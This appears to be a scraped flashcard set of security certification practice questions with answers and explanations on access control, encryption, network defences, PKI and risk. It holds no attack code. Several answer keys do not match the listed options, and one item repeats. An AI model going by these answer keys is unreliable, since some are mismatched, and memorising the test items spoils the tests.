C. You would want to write a rule that automatically gives Bob write access to the database when Alice is gone. This is an example of rule-based access control. In this type of access control model, the security administrator writes the rule and allows the computer to automate the action of the rule when necessary. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Discretionary access control (DAC) is when the user has ownership of the resource in question and can create permissions as necessary. Mandatory access control (MAC) is similar to rule-based access control; in fact, rule-based access control is a subset of MAC. However, MAC is controlled by the system and does not work at this type of depth concerning rules. Role-based access control (RBAC) concerns users and their roles in the organization, including which groups they are members of, and applies rights and permissions accordingly. Attribute-based access control (ABAC) is a context-aware model that utilizes dynamic authentication and bases its decisions on the results of IF-THEN statements.

Which of the following tools require a computer with a network adapter that can be placed in promiscuous mode? Select 2. Password cracker Vulnerability scanner Network mapper Protocol analyzer Port scanner

CD

In an environment where the transmission and storage of PII data needs to be encrypted, what methods should you select? (Select the two best answers.) TFTP TKIP SSH PGP SNMP NTLM

CD. SSH (Secure Shell) can secure connections to remote machines and is instrumental in encrypting data in motion over the network. PGP (Pretty Good Privacy) encrypts data that is meant for transit via e-mail or for data that is meant to be at rest, or simply stored somewhere for an indeterminate amount of time. These are the only answers listed that will encrypt data and/or data sessions (and are not outdated). Incorrect answers: TFTP is used to send small and basic files in an unsecure manner between two hosts on a LAN. It does not encrypt data. The Temporal Key Integrity Protocol (TKIP) is used as a security protocol in wireless networks but is outdated and should be replaced by either Counter Mode CBC-MAC Protocol (CCMP) or Advanced Encryption Standard (AES). TKIP is insecure because it makes use of RC4, which is considered outdated. The Simple Network Management Protocol (SNMP) concerns the monitoring of networks and network devices and hosts. NTLM (NT LAN Manager hash) is a cryptographic hashing protocol used with Windows passwords. This is also outdated and should be replaced with NTLMv2.

Your organization uses a SOHO wireless router all-in-one device. The network has five wireless BYOD users and two web servers that are wired to the network. What should you configure to protect the servers from the BYOD users' devices? (Select the two best answers.) Implement EAP-TLS Change the default HTTP port Create a VLAN for the servers Deny incoming connections to the outside router interface Disable physical ports Create an ACL to access the servers

CF. If the servers and the BYOD users are on the same network, then the BYOD users could easily access the servers, regardless of whether a computer is connected in a wired fashion or wireless fashion by default. So to protect the servers from the users' mobile devices, you could first create a virtual LAN (VLAN) for the servers. This VLAN would separate the servers and you could then control who is allowed access to the servers via access control lists (ACLs) within the firewall portion of the SOHO all-in-one wireless router. If the SOHO router supported it, you could also place the web servers in a DMZ. Incorrect answers: The EAP-TLS authentication scheme should not be necessary for this scenario; it is used, for example, to authenticate wireless clients to a wireless network, which was not specified in the question. Changing the default HTTP port (which is normally 80) would cause your Internet guests some difficulty in finding the web servers, and is not necessary in this scenario either. Denying incoming connections to the outside router interface would also make it difficult for Internet users to access the web servers, and is therefore not recommended. If a physical port is disabled, anything connected to that port will be effectively offline. This also compounds the issue instead of solving it.

In which of the following phases of identification and authentication does proofing occur? Verification Authentication Authorization Identification

D. Identification is the phase in which identity proofing occurs. Identity proofing is an initial validation of an identity. See the section "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Authentication happens afterward, granting access to a network or building. Then authorization occurs when a person is approved access to specific resources. Verification of identification is important within authentication schemes; for example, a security guard may be required to run checks of employees' IDs.

One of your co-workers has been issued a new smart card because the old one has expired. The co-worker can connect to the computer network but is unable to send digitally signed or encrypted e-mail. What does the security administrator need to perform? Make certificates available to the operating system Recover the previous smart card certificates Remove all previous smart card certificates from the local certificate store Publish new certificates to the global address list

D. A certificate is required to send digitally encrypted and signed e-mail. Certificates based on a smart card must be published to the global address list when using a Microsoft Exchange Server and Microsoft Outlook client for e-mail. Expired smart cards (and their certificates) will not function; expired smart cards' certificates should be revoked. See the section "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Certificates are not published to the operating system; they are published to the e-mail application. You cannot recover the previous smart card certificates because those have expired and will be on the revoked list. Removing the previous smart card certificates is a good idea, but won't help with the current problem.

Your LAN is isolated from the Internet by a perimeter network. You suspect that someone is trying to gather information about your LAN. The IT director asks you to gather as much information about the attacker as possible while preventing the attacker from knowing that the attempt has been detected. What is the best method to accomplish this? Deploy a DMZ Deploy a proxy server in the perimeter network Deploy a NIPS outside the perimeter network Deploy a honeypot in the perimeter network

D. A honeypot can be used to lure attackers in and trap them while you analyze their methods. The honeypot is usually placed within the perimeter network, which is the DMZ. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Proxy servers are usually not placed in the perimeter network; they act as go-betweens, or mediators, for users on the LAN and servers on the Internet. A NIPS (network intrusion prevention system) can be placed in or out of a perimeter network, but it does not lure in attackers; instead, a NIPS attempts to prevent attacks from happening.

A systems administrator requires an all-in-one device that combines various levels of defense into one solution. She requires a single device that sits last on the network before the Internet connection. Which of the following would be the best solution? Circuit-level gateway DLP WIDS UTM

D. A unified threat management (UTM) device is an all-in-one device that combines the various levels of defense into one solution. Often, this is a single device that sits last on the network before the Internet connection. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A circuit-level gateway works at the session layer of the OSI model, and applies security mechanisms when a TCP or UDP connection is established; it acts as a go-between for the transport and application layers in TCP/IP. Circuit-level gateways hide information about the private network, but they do not filter individual packets. Data loss prevention (DLP) systems are designed to protect data by way of content inspection. They are meant to stop the leakage of confidential data, often concentrating on communications. A WIDS is a wireless IDS that monitors the radio spectrum for unauthorized access and rogue access points.

A systems administrator must configure access to the corporate network such that users always have access without the need to periodically disconnect and reconnect. Which of the following best describes the type of connection that should be configured? Federated identify management Kerberos Generic Routing Encapsulation Always-on VPN PPTP

D. Always-on VPN functionality is where a user can always have access via the VPN without the need to periodically disconnect and reconnect. This is usually done with the aid of SSL/TLS. Compare this to other VPN methods such as L2TP and PPTP where the user may need to disconnect and reconnect. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Federated identity management is when a user's identity and attributes are shared across multiple identity management systems. These various systems can be owned by one organization; for example, Microsoft offers the Forefront Identity Manager (FIM) software—a state-based identity management product—which can control user accounts across local and cloud environments. Kerberos is an authentication protocol that enables computers to prove their identity to each other in a secure manner. It is used most often in a client-server environment; the client and the server both verify each other's identity. Cisco systems use the Generic Routing Encapsulation (GRE) protocol to encapsulate routing information that passes between VPN-enabled connected networks that use PPTP or IPsec. Point-to-Point Tunneling Protocol (PPTP) is still commonly used (on SOHO routers and elsewhere) for VPNs, but it is an older method that has security flaws. Many organizations now opt for SSL/TLS-based VPNs.

In the event of a short-term power loss to the server room, what should be powered on first in order to establish DNS services? Apache server Exchange server RADIUS BIND server

D. BIND stands for Berkeley Internet Name Domain. It is the most widely used DNS server on the Internet and was originally designed at the University of California at Berkeley. It normally runs on Unix systems. This would have to be booted first in order to establish DNS services; in fact, it is the only server listed that will establish DNS services in this scenario. Incorrect answers: Apache is a type of web server. Exchange is a type of e-mail server. RADIUS is an authentication server. None of these establish DNS services, unless DNS has also been loaded on those computers separately.

Which of the following statements best defines a computer virus? It is a find mechanism, initiation mechanism, and can propagate. It is a search mechanism, connection mechanism, and can integrate. It is a learning mechanism, contamination mechanism, and can exploit. It is a replication mechanism, activation mechanism, and has an objective.

D. Computer viruses are code that acts as a replication mechanism, replicating from file to file. They are activated by users who execute the virus. Viruses have an objective, which could be one of many malicious functions. Incorrect answers: Viruses do not propagate from computer to computer, but worms do. Viruses are not search or learning mechanisms either.

Which of the following defines the main difference between identification and authentication? Authentication verifies the identity of a user requesting credentials, whereas identification verifies a set of credentials. Authentication verifies a set of credentials, whereas identification verifies the identity of the network. Authentication verifies a user ID that belongs to a specific user, whereas identification verifies the identity of a user group.

D. Explanation: Identification is when a person is in a state of being identified. It can also be described as something that identifies a person, such as an ID card. Authentication is when a person's identity is confirmed or verified through the use of a specific system based on credentials.

Password-cracking tools are easily available over the Internet. Which of the following is a password-cracking tool? AirSnort Nessus Wireshark John the Ripper

D. John the Ripper is a password-cracking tool, otherwise known as a password analysis or recovery tool; it all depends on who uses the tool. This particular tool can do dictionary attacks, brute-force attacks, and cryptanalysis attacks on passwords. See the section "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: AirSnort is a wireless network finder. Nessus is a vulnerability scanner, and Wireshark is a protocol analyzer, otherwise known as a network sniffer.

Study the following items carefully. Which one permits a user to "float" a domain registration for a maximum of 5 days? DNS poisoning Domain hijacking Domain spoofing Kiting DNS amplification

D. Kiting is when a person floats a domain for up to 5 days. Domain name kiting is the process of deleting a previously registered domain name within the 5-day grace period given to the user by the domain registrar. This grace period is also known as an add grace period, or AGP. The person doing the kiting will immediately reregister the domain name for another 5-day period and continue the process until the domain name is sold for a profit. Otherwise, the person will continue to use the domain without ever paying for it. See the section "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: DNS poisoning is the modification of name resolution information in a DNS server's cache. Domain hijacking is the process by which the registration of a domain name is transferred without the permission of the owner. Domain spoofing is attempting to make users think that your domain is actually another one; this is commonly done with similar-looking domain names. DNS amplification is an attack that targets servers and network devices by sending bulk requests that are smaller than the responses.

Which of the following threats has the highest probability of being increased by the availability of devices such as USB flash drives on your network? Introduction of new data on the network Increased loss of business data Loss of wireless connections Removal of PII data

D. Personally identifiable information (PII) and other sensitive data can easily be removed from the network through the use of USB flash drives and other similar removable media. This is the most important threat you need to be aware of that could increase due to the use of these devices. See the section "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Although new data on the network might be introduced, or business data might be lost, the most common threat when USB flash drives are available is the removal of PII data.

What kind of attack enables an attacker to access administrator-level resources using a Windows service that uses the local system account? Trojan Spyware Spam Privilege escalation

D. Privilege escalation is the act of gaining a higher level of access to resources. It is sometimes done by using the local system account in Windows.

Identifying residual risk is considered to be the most important task when dealing with which of the following? Risk acceptance Risk deterrence Risk avoidance Risk mitigation

D. Risk acceptance, also known as risk retention, is the amount of risk that an organization is willing to allow after risk has been reduced as much as possible. The actual amount is known as residual risk; the amount left over after a detailed security plan has been implemented. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Risk deterrence involves implementing systems and policies that mitigate risk. Risk avoidance is when a proposed security plan is not carried out because the risk factor is too great. Risk mitigation is the attempt to eliminate risk, similar to risk reduction.

What two security precautions can best help to protect against wireless network attacks? Authentication and WEP Access control lists and WEP Identification and WPA2 Authentication and WPA

D. The best two security precautions are authentication and WPA. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Although WPA2 is more secure than WPA, the term "identification" is not correct. WEP is a deprecated wireless encryption protocol and should be avoided.

You are in the middle of the information gathering stage of the planning and deployment of a role-based access control model. Which of the following is most likely required? Clearance levels of personnel Rules under which certain systems can be accessed Group-based privileges already in place Matrix of job titles with required privileges

D. The information gathering stage of a task such as this requires a matrix of job titles and required privileges, preferably something in spreadsheet format that can easily be entered into the system quickly. Each employee in the matrix would fall into a specific role in the RBAC model. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: The important information here for the RBAC model is the names of employees, job titles, and their required privileges. The clearance levels are also important, but they should be translated into required privileges before they are sent to the security administrator planning the RBAC model. Rules under which certain systems can be accessed aren't required here; besides, that would be an example of rule-based access control, not role-based access control. Any group-based privileges already in place will most likely be wiped clean once the new RBAC system is up and running, so they probably aren't necessary either.

You've created a baseline for your Windows Server file server. Which of the following tools can best monitor changes to your system baseline? Key management software Resource planning software Antivirus software Performance monitoring software

D. Use performance monitoring software to monitor for any changes to your system baseline. CPU spikes, higher levels of hard drive access, and other objects within your server performing other than normal can be detected by the performance monitoring software. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Key management software manages the deployment of encrypted keys and certificates. Resource planning software is for planning for fault tolerance and disaster recovery. Antivirus software protects and prevents against malware attack.

The IT director asks you to verify that the organization's virtualization technology is implemented securely. What should you do? Verify that virtual machines are multihomed Perform penetration testing on virtual machines Subnet the network so that each virtual machine is on a different network segment Verify that virtual machines have the latest updates and patches installed

D. Verify that virtual machines have the updates and patches installed Explanation: One of the most important security precautions you can take is to install the updates and patches. This concept applies to regular operating systems, applications, and virtual machines.

A security administrator is required to submit a new CSR to a CA. What is the first step? Generate a new private key based on AES Generate a new public key based on RSA Generate a new public key based on AES Generate a new private key based on RSA

D. When a person is required to submit a CSR (certificate signing request) to a CA (certificate authority), the first step - before generating the CSR - is to create a private key. This will be an asymmetric key such as RSA, commonly a 2048-bit key. (In fact, since the end of 2013 it is mandated that the key be 2048-bit or larger.) The next steps are to generate the CSR, submit the CSR for signing (the crucial part of the process), and finally install the signed certificate. It is important to keep the original RSA private key safe and secure. No one, including the CA, should know the RSA key. The CA should only know the CSR generated, which is based on the private RSA key. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Symmetric keys such as AES are not used for this process; asymmetric keys such as RSA are the standard. The security administrator must use and keep safe a private key that only he or she knows. Later, when people connect to the organization's website or network, they will make use of the public key portion.

A security auditing consultant has completed a security assessment and gives the following recommendations: 1. Implement fencing and additional lighting around the perimeter of the building. 2. Digitally sign new releases of software. Categorically, what is the security consultant recommending? (Select the two best answers.) Encryption Availability Confidentiality Safety Fault tolerance Integrity

DF. The fencing and additional lighting are for employee safety, especially at night. Digitally signing software, or anything else, speaks to keeping the integrity of the software intact. Hashing is another concept that could be implemented. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," and "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information.

(messer) Which of the following would be most responsible for data accuracy, privacy, and security, associating sensitivity labels to data, and ensuring compliance with any applicable laws and standards? Data custodian Data owner Privacy officer System administrator Data steward

E

Which of the following is the first step in creating a security baseline? Define a security policy Install software patches Perform vulnerability testing Mitigate risk

When creating a security baseline, you should first define what the security policy will be for the organization. The organization might already have a policy written and expected to be enforced. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: After a security policy is created, perform vulnerability testing and mitigate risks by installing software patches, uninstalling applications, disabling unnecessary services, and so on.

When creating a security baseline, you should first define what the security policy will be for the organization. The organization might already have a policy written and expected to be enforced. After a security policy is created,

perform vulnerability testing and mitigate risks by installing software patches, uninstalling applications, disabling unnecessary services, and so on.


Related study sets

Aircraft Mechanic - Block IV (Basic Electricity)

View Set

Smartbook: Chapter 2 Analyzing and Recording Transactions

View Set